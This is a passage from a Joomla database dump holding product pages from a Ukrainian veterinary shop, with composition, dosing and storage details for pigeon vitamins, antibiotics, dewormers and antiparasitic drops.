00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,2,'','',1,64,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2457,2874,'\"Біомікс\" премікс для голубів вітамінний','biomiks-premiks-dlya-golubiv-vitaminnij','<p><img alt=\"\" class=\"fr-fir fr-dii\" src=\"https://malehus.in.ua/images/stories/biomix1.jpg\" width=\"377\"></p><p style=\"text-align: left;\">Комплекс життєво необхідних вітамінів мікро- та  макроелементів у фізіологічно оптимальному співвідношенні. Компоненти преміксу  сприяють підвищенню стійкості до хвороб, кращому засвоєнню поживних речовин і  розвитку птахів за всіма найважливішими показниками, нормалізації обміну  речовин, посиленню життєздатності молодняка голубів, формуванню кісткової  системи та покращенню пір\'яного покриву.</p><p>Бренд:ППФ \"Фарматон\"</p><p>Лікарська форма випуску: Порошок</p><p>Опис:<br>  Однорідна сипуча суміш без ознак та запаху  плісняви.<br><br>  Склад:<br>  1 кг преміксу містить:</p>','<p><br></p><table><tbody><tr><td><p>Вітамін А</p></td><td><p>200 000 Од.</p></td></tr><tr><td><p>Вітамін Д3</p></td><td><p>20 000 Од.</p></td></tr><tr><td><p>Вітамін Е</p></td><td><p>100 мг</p></td></tr><tr><td><p>Вітамін К3</p></td><td><p>50 мг</p></td></tr><tr><td><p>Вітамін В1</p></td><td><p>90 мг</p></td></tr><tr><td><p>Вітамін В2</p></td><td><p>80 мг</p></td></tr><tr><td><p>Вітамін В6</p></td><td><p>50 мг</p></td></tr><tr><td><p>Вітамін В12</p></td><td><p>0,2 мг</p></td></tr><tr><td><p>Кальпан</p></td><td><p>520 мг</p></td></tr><tr><td><p>Нікотинова кислота</p></td><td><p>200 мг</p></td></tr><tr><td><p>Вітамін С</p></td><td><p>500 мг</p></td></tr><tr><td><p>Бетафін</p></td><td><p>2000 мг</p></td></tr><tr><td><p>Фолієва кислота</p></td><td><p>40 мг</p></td></tr><tr><td><p>Біотин</p></td><td><p>4 мг</p></td></tr><tr><td><p>Сірка</p></td><td><p>1200 мг</p></td></tr><tr><td><p>Цинк</p></td><td><p>800 мг</p></td></tr><tr><td><p>Мідь</p></td><td><p>100 мг</p></td></tr><tr><td><p>Залізо</p></td><td><p>4000 мг</p></td></tr><tr><td><p>Йод</p></td><td><p>25 мг</p></td></tr><tr><td><p>Марганець</p></td><td><p>1200 мг</p></td></tr><tr><td><p>Кобальт</p></td><td><p>40 мг</p></td></tr><tr><td><p>Кальцій</p></td><td><p>32,00%</p></td></tr><tr><td><p>Фосфор</p></td><td><p>0,35%</p></td></tr></tbody></table><p>Властивостi: Комплекс життєво необхідних  вітамінів мікро- та макроелементів у фізіологічно оптимальному співвідношенні.  Компоненти преміксу сприяють підвищенню стійкості до хвороб, кращому засвоєнню  поживних речовин і розвитку птахів за всіма найважливішими показниками,  нормалізації обміну речовин, осиленню життєздатності молодняка голубів,  формуванню кісткової системи та покращенню пір\'яного покриву.<br>  Застосування:<br>  Рекомендовано застосовувати для оштово-спортивних,  статних, ігрових, короткодзьобих, високольотних та інших порід голубів.<br><strong>  Дозування:</strong><br><strong>  1 варіант</strong>: засипати в невелику ємність годівницю)  для вільного доступу голубів протягом року. Регулярно поновлювати запас  преміксу та утримувати його в сухому стані.<br><strong>  2 варіант</strong>: задавати 30 г (2 ст. ложки) преміксу  на 1 кг зерносуміші. Протягом періоду розведення і линьки збагачену зерносуміш  задавати 3 рази на тиждень, а в період змагань — 2 рази на тиждень.<br>  Протипоказання: Не має.<br>  Зберiгання:<br>  В сухому місці при температурі від - 0°С до  30°С.<br>  Форма випуску: Пакети з ламінованого паперу та плівки поліетиленової  по 200, 1000 г.<br>  Термін придатності: 12 місяців з дня виготовлення.<br>  Для застосування у ветеринарній медицині!<br>  Виробник продукту:<br>  ПП фірма “Фарматон”, 33000, Україна, м. Рівне,  вул. Дворецька, 89.</p>',1,135,'2020-09-02 06:34:57',430,'','2020-09-02 06:50:06',430,0,'0000-00-00 00:00:00','2020-09-02 06:34:57','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',8,9,'','',1,37,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2458,2875,'Тімокс - комплексний препарат','timoks-kompleksnij-preparat','	<p><img alt=\"\" class=\"fr-fir fr-dii\" src=\"https://malehus.in.ua/images/stories/timox1.jpg\" width=\"439\"></p><p>Опис:<br>  Порошок жовтого кольору із специфічним запахом.<br><br>  Склад:<br>  1 г містить діючі речовини:<br><strong>  метронідазол 20 мг;<br>  тіамулін гідроген фумарат 50 мг;<br>  окситетрациклін гідрохлорид 60 мг.<br>  Допоміжна речовина: глюкоза.</strong><br><br><strong>  Фармакологiчнi властивостi:</strong><br>  Окситетрациклін - антибіотик широкого спектру дії, ефективний  проти аеробних грам-позитивних та грам-негативних бактерій, а також деяких  анаеробів, хламідій (Chlamidia spp.), мікоплазм (Mycoplasma spp.), деяких простіших та рикетсій (Rickettsia spp.). Спектр дії поширюється  також на Actinobacillus spp., E. сoli, Klebsiella spp., Pasteurella spp., Salmonella spp., Staphylococcus spp., Streptococcus spp..<br>  Тіамулін діє бактеріостатично щодо мікоплазм (Mycoplasma spp.), спірохет (Serpulina spp.), хламідій (Chlamydia spp.), Pasteurella multocida, Staphylococcus spp., Streptococcus spp..<br>  Метронідазол ефективний проти Eimeria spp., Histomonas meleagridis, Trichomonas columbae, T.gallinae, лямблій ( Lamblia intestinalis) та амеби.<br><strong>Застосування:</strong><br>  Для профілактики та лікування у голубів та декоративних  птахів гістомонозу, еймеріозу, сальмонельозу, тріхомонозу та первинних і  вторинних інфекцій, зумовлених мікроорганізмами, чутливими до дії комбінації  метронідазолу, окситетрацикліну та тіамуліну.<br><strong>Дозування:</strong><br><strong><u>  Препарат задають у суміші з водою груповим способом у дозі  1-2 г препарату на 1 л води щоденно протягом 5-6 діб.</u></strong></p>','<p><br></p><p>Протипоказання:</p><p>  Не застосовувати продуктивним тваринам.</p><p>  Не застосовувати м´ясо та продукцію тварин та птиці  призначених для використання в їжу людиною.</p><p>  Підвищена індивідуальна чутливість до окситетрацикліну,  метронідазолу та тіамуліну.</p><p>Форма  випуску:</p><p>  Фольговані пакети по 10, 100, 200 г.</p><p>Зберігання:</p><p>  Сухе темне, недоступне для дітей місце за температури від 5°  до 25°С.</p><p>Термін  придатності:</p><p>  2 роки.</p><p>  Для застосування у ветеринарній медицині!</p><p>Виробник  готового продукту:</p><p>  ПП фірма “Фарматон”, 33000, Україна, м. Рівне, вул. Дворецька, 89.</p><p><br></p>',1,135,'2020-09-02 06:41:29',430,'','2020-09-02 06:45:26',430,0,'0000-00-00 00:00:00','2020-09-02 06:41:29','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,8,'','',1,53,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2459,2876,'Вітамінний комплекс НУТРІФАРМ','vitaminnij-kompleks-nutrifarm','<p><img alt=\"\" class=\"fr-fir fr-dii\" src=\"https://malehus.in.ua/images/stories/nutrifarm1.jpg\"></p><p>Опис:<br>  Однорідний сипучий порошок від жовтого до світло-коричневого  кольору із специфічним запахом, що розчиняється у воді.<br>  <br>  Склад:<br>  1 кг порошка містить:<br>  вітамін А (ретинол) —10 000 000 Од;<br>  вітамін Д3 (холекальциферол) — 700 000 Од;<br>  вітамін Е (токоферол ацетат) - 5500 мг;<br>  вітамін К3 (менадіон) - 1750 мг;<br>  вітамін С (аскорбінова кислота) — 20 000 мг;<br>  вітамін В1 (тіамін) — 1250 мг;<br>  вітамін В2 (рибофлавін) — 2500 мг;<br>  вітамін В3 (нікотинова кислота) — 18 000 мг;<br>  вітамін В5 (пантотенова кислота) — 6000 мг;<br>  вітамін В6 (піридоксин) — 2000 мг;<br>  вітамін В9 (фолієва кислота) 400 мг;<br>  вітамін В12 (ціанокобаламін) — 7,5 мг;<br>  лізин — 4000 мг;<br>  метіонін — 4000 мг;<br>  триптофан —600 мг;<br>  селен — 33 мг.<br>  лактозу.<br>  <br>  Фармакологiчнi властивостi:<br>  Властивості водорозчинного вітамінно-амінокислотного  концентрату зумовлені наявністю вітамінів, амінокислот та селену, які входять  до його складу. Вітаміни відіграють роль каталізаторів в організмі тварин.  Незамінні амінокислоти необхідні для синтезу білка. Селен бере участь в  метаболізмі тиреоїдних гормонів, гормонів щитовидної залози, які необхідні для  росту і диференціації всіх клітин в організмі (фактор розвитку), підвищує  резистентність організму до несприятливих факторів навколишнього середовища та  попереджує пошкодження клітин, зумовлене процесом окислення. Концентрат  активізує окисно-відновні реакції, процеси кровотворення, підвищує  засвоюваність кормів, яйценоскість, нормалізує обмін речовин, забезпечує  високий темп розвитку молодняка та покращення стану його здоров\'я, знижує  падіж, підтримує продуктивність сількогосподарських тварин і птиці на високому  рівні при стресових ситуаціях.<br>  <br>  Застосування:<br>  Нутріфарм застосовують для профілактики та лікування  гіповітамінозів, зниження впливу на організм тварин і птиці стрес-факторів  різного походження, при порушеннях метаболізму в печінці, при захворюваннях,  спричинених недостатністю селену і амінокислот в кормах, для стимуляції імунної  системи під час вакцинації, підвищення продуктивності і ефективності  використання кормів, підвищення статевої активності самців та збільшення  тривалості використання маточного поголів\'я.<br>  <br>  Дозування:<br>  Перорально з питною водою або у суміші з кормом у дозах:<br>  домашній птиці розчин задають груповим способом, для чого розчиняють  концентрат у питній воді у співвідношенні 1 г на 2 л питної води і випоюють  розчин протягом доби, що достатньо для 12 курей, 20 бройлерів або гусей, 20-25  курчат, 5 індиків;<br>  поросятам (віком 2-4 місяці) 0,4-0,8 г на голову;<br>  ягнятам і козлятам 0,5-0,8 г на голову;<br>  телятам і лошатам 2-3 г на голову;<br>  хрякам 5-10 г на голову.<br>  Концентрат в зазначених дозах розчиняють у воді чи у суміші з  кормом та задають тварині протягом доби.<br>  Розчин готують кожного дня, суміш з кормом можна підготувати  заздалегідь та використовують з профілактичною метою протягом 3-7 днів; з  лікувальною протягом 5-10 днів.<br>  <br>  Протипоказання:<br>  Не використовувати в місцевостях, де в кормах міститься  надлишок селену.<br>  <br>  Застереження:<br>  Не додавати у гарячий корм.<br>  <br>  Форма випуску:<br>  Пластикові пакети по 1, 3, 5, 10 г та 1000 г.<br>  <br>  Зберiгання:<br>  В сухому недоступному для дітей місці при температурі не вище  25°С.<br>  <br>  Термін придатності:<br>  12 місяців з дня виготовлення.<br>  Приготовлений розчин придатний протягом доби.<br>  <br>  Виробник:<br>  ПП фірма “Фарматон”, 33000, Україна, м. Рівне, вул.  Дворецька, 89  </p>','',1,135,'2020-09-02 06:56:35',430,'','2020-09-02 07:04:17',430,0,'0000-00-00 00:00:00','2020-09-02 06:56:35','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,6,'','',1,22,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2460,2877,'Тілоциклін - антибактеріальний препарат для системного застосування','tilotsiklin-antibakterialnij-preparat-dlya-sistemnogo-zastosuvannya','	<p><img src=\"https://malehus.in.ua/images/stories/tilociklin.jpg\" alt=\"\" class=\"fr-fir fr-dii\"></p><p>Порошок світло-жовтого кольору розчинний  у воді.<br>  <br>  Склад<br>  Препарат містить тилозин тартрат, доксициклін та метронідазол.<br>  <br>  Застосування<br>  Для лікування і профілактики в голубів і декоративних птахів при захворюваннях  дихальних шляхів, орнітозу (Chlamydophila psittaci); мікоплазмоза (Mycoplasma columborale); кишкової палички (Esherichia coli); Pelistega europea; Staphylococus intermedius; трихомонозу (Trichomonas gallinae).<br>  Симптоми: чхання, задишка, утруднене дихання, виділення з носа,  сльозоточивість, набряк повік, дихання з відкритим дзьобом, збільшена кількість  слини в роті, нальоти на горлі, гортані, трахеї.<br>  <br>  Дозування<br>  - для лікування 2,5 г/1 л води (40 голубів) протягом 5-7 днів. При гострій  формі і орнітозі 5 г/1 л води протягом 8-16 днів;<br>  - для профілактики: щомісячно 2,5 г/1 л води протягом 3 днів;<br>  - для досягнення гарної фізичної форми: 2,5 г/1л води протягом 5 днів на  початку гоночного сезону;<br>  - для підтримки спортивної форми: 2,5 г/1л води протягом 2 днів після  навантаження (гонки або тренування).<br>  <br>  Застереження<br>  Не використовувати для птахів, призначених для вживання в їжу.<br>  <br>  Форма випуску<br>  Фольговані пакети по 10, 200 г<br>  <br>  Зберігання<br>  Сухе місце за температури від 5° до 25 °С.<br>  <br>  Виробник<br>  ПП фірма \"Фарматон\", вул. Дворецька, 89, м. Рівне, Україна, 33001</p>','',1,135,'2020-09-02 07:09:01',430,'','2020-09-02 07:09:11',430,0,'0000-00-00 00:00:00','2020-09-02 07:09:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,7,'','',1,126,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2461,2878,'Празіфен - глистогінний препарат','prazifen-glistoginnij-preparat','<p><img src=\"https://malehus.in.ua/images/stories/prazifen1.jpg\" alt=\"\" class=\"fr-fir fr-dii\"></p><p>1 таблетка містить 1,43 мг празиквантелу, 11,43 мг фенбендазолу.<br>  <br>  Фармакологічні  властивості:<br>  Празіфен - антигельмінтний препарат, дія якого зумовлена  вмістом празіквантелу та фенбендазолу відносно нематод та цестод у голубів. Сумiсна дiя празіквантелу і фенбендазолу розширює дiапазон антигельмінтної дii препарату, не вимагає збiльшення дози при змiшаних гельмiнтозах i робить дегельмiнтизацiю більш ефективною,<br>  <br>  Застосування:<br>  Препарат застосовують для лікування і профілактики  цестодозов, нематодозов у голубів.<br>  <br>  Дозування:<br>  Препарат застосовують перорально індивідуально по 1 таблетці  кожному голубу вагою до 250 г одноразово. При сильній інвазії лікування  повторюють через 4-6 тижнів. З метою профілактики рекомендується обробку  повторювати кожні 4 місяці.<br>  <br>  Застереження:<br>  Не застосовувати виснаженої птиці, а також з піперазином,  холінергічних препаратами (фосфорорганічні інсектициди, антгельмінтіки) або  відразу після їх застосування.<br>  <br>  Форма  випуску:<br>  Пакети із фольги по 50 таблеток.<br>  <br>  Зберігання:<br>  Сухе темне, недоступне для дітей місце за температури від 5°  до 25°С.<br>  <br>  Термін  придатності:<br>  2 роки.<br>  <br>  Для  застосування у ветеринарній медицині:<br>  <br>  Виробник:<br>  ПП фірма “Фарматон”, 33000, Україна, м. Рівне, вул. Дворецька, 89.</p>','',1,135,'2020-09-02 07:13:22',430,'','2020-09-02 07:13:22',0,0,'0000-00-00 00:00:00','2020-09-02 07:13:22','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,5,'','',1,102,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2462,2879,'Метронідазол 20 % (для голубів)','metronidazol-20-dlya-golubiv','<p><img alt=\"\" class=\"fr-fir fr-dii\" src=\"https://malehus.in.ua/images/stories/metronidazol20.jpg\"></p><p>Белый или  светло-желтый порошок или мелкий гранулят, кисло-горького вкуса.</p><p> </p><p>Состав</p><p>100 г препарата  содержит действующее вещество:</p><p>метронидазол -  20,0 г.</p><p>Вспомогательные  вещества: ангидрид лимонной кислоты.</p><p> </p><p>Фармакологические  свойства</p><p>Метронидазол  относится к группе 5-нитроимидазола. Механизм действия метронидазола  заключается в биохимическом восстановлении 5-нитрогруппы метронидазола  внутриклеточными транспортными протеинами анаэробных бактерий и простейших.  Восстановленная 5-нітрогруппа метронидазола взаимодействует с ДНК микробной  клетки, інгибіруючи синтез ее нуклеиновых кислот, что ведет к гибели  микроорганизма. Эффективен против Trichomonas vaginalis, Gardnerella vaginalis, Giardia intestinalis, Entamoeba histolytica, облигатных  анаэробных бактерий ( Baderoides spp. ( Bacteroides fragilis, Bacteroides distasonis, Bacteroides ovatus, Bacteroides thetaiotaomicron, Bacteroides vulgatus), Fusobacterium spp., Veillonela spp.), некоторых грамположительных бактерий ( Eubacterium spp., Clostridium spp., Peptococcus spp., Peptostreptococcus spp).</p><p> </p><p>Применение</p><p>Лечения голубей,  больных трихомонадоз, вызванный микроорганизмами, чувствительными к  метронидазолу.</p><p> </p><p>Дозировка</p><p>Перорально в дозе  50 мг на кг массы тела.</p><p>С  профилактической целью прапарат применяют с кормом в концентрации 0,05% (в  расчете на метронидазол) -25 г препарата на 10 кг корма.</p><p>С лечебной целью  применяют в З раза больше дозы - 0,15% (75 г препарата на 10 кг корма).</p><p>При задаванні  препарата с питьевой водой, профилактически применяют раствор 0,02% (10 г  препарата, растворенного в 10 л питьевой воды), а лечебно - раствор 0,06% (30 г  препарата, растворенного в 10 л питьевой воды).</p><p>Препарат  применяют не меньше, чем 19 суток.</p><p> </p><p>Противопоказания</p><p>Повышенная  чувствительность к метронидазолу.</p><p> </p><p>Внимание</p><p>Не применять для  голубей, предназначенных для забоя на м\'ясо.</p><p> </p><p>Форма выпуска</p><p>Пакеты из  алюминиевой фольги по 50 и 100 г.</p><p> </p><p>Хранение</p><p>Сухое, темное,  недоступное для детей место при температуре от 18° до 25°С.</p><p> </p><p>Срок годности</p><p>2 года.</p><p>Для применения в  ветеринарной медицине!</p><p> </p><p>Производитель:</p><p>PFO Vetos-Farma Sp. z o.o., ul. Dzierżoniowska 21, 58-260  Bielawa, Woj. dolnośląskie</p>','',1,135,'2020-09-02 07:18:03',430,'','2020-09-02 07:22:36',430,0,'0000-00-00 00:00:00','2020-09-02 07:18:03','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,4,'','',1,54,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2463,2881,'Івермікол для голубів (краплі)','ivermikol-dlya-golubiv-krapli','<p>Склад:</p><p>  Препарат містить діючу речовину: івермектин<img src=\"https://malehus.in.ua/images/stories/ivermikolgol.jpg\" alt=\"\" class=\"fr-fir\" width=\"302\"><br>  <br>  Фармакологічні властивості:<br>  АТСvet QP54AA, авермектини (QP54AA01, івермектин).<br>  Препарат має широкий спектр протипаразитарної дії, активний відносно вошей,  кліщів, бліх, пухопероїдів та кишкових нематод.<br>  Діюча речовина препарату, івермектин, належить до хімічної групи макроциклічних  лактонів. Фармакологічна дія івермектину полягає у блокаді нервової або  нервово-м′язової передачі шляхом впливу на γ-аміномасляну кислоту  (ГАМК), внаслідок чого порушується передача нервових імпульсів ектопаразитів і  нематод, що призводить до їх паралічу і загибелі.<br>  Дорослі паразити, які паразитують на тілі птиці, після обробки препаратом  “Івермікол” гинуть через 2-3 доби, дія препарату триває до 30 діб.<br>  <br>  Застосування:<br>  Лікування і профілактика голубів та декоративних птахів при ураженні  ектопаразитами: кліщами, вошами, блохами, пухопероїдами та при кишкових  нематодозах.<br>  <br>  Дозування:<br>  Препарат застосовувати зовнішньо одноразово. Наносити на суху та непошкоджену  шкіру між лопатками птиці в наступних кількостях:<br>  1 крапля на голуба вагою 250 г;<br>  2 краплі на голуба вагою 500 г;<br>  1 крапля для декоративних птахів (папуг, канарок).<br>  У разі необхідності, процедуру можна повторити через 4-6 тижнів.<br>  <br>  Протипоказання:<br>  Не застосовувати птахам молодше 8 тижнів або вагою менше 100 г.<br>  Не застосовувати під час основного сезону линьки.<br>  Не застосовувати хворим та ослабленим птахам.<br>  <br>  Застереження:<br>  Запобігати попаданню препарату на слизові оболонки і в травний канал.<br>  При появі клінічних ознак ускладнень після обробки птиці препаратом звернутися  до лікаря ветеринарної медицини.<br>  Після обробки препаратом птицю не рекомендується купати протягом 2 годин до  повного висихання пір’яного покриву, не можна гладити і допускати її до  маленьких дітей.<br>  При випадковому попаданні препарату на шкіру або слизові оболонки необхідно  відразу промити їх проточною водою.<br>  Після закінчення обробки птиці необхідно вимити руки з милом.<br>  <br>  Форма випуску:<br>  Полімерні флакони по 10 мл.<br>  <br>  Зберiгання:<br>  Сухе темне недоступне для дітей місце за температури від 5° до 25 °С.<br>  <br>  Термін придатності:<br>  2 роки.<br>  <br>  Виробник готового продукту:<br>  ПП фірма “Фарматон”, 33000, Україна, м. Рівне, вул. Дворецька, 89.</p><p><br></p>','',1,135,'2020-09-03 06:10:25',430,'','2020-09-03 06:10:25',0,0,'0000-00-00 00:00:00','2020-09-03 06:10:25','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alterna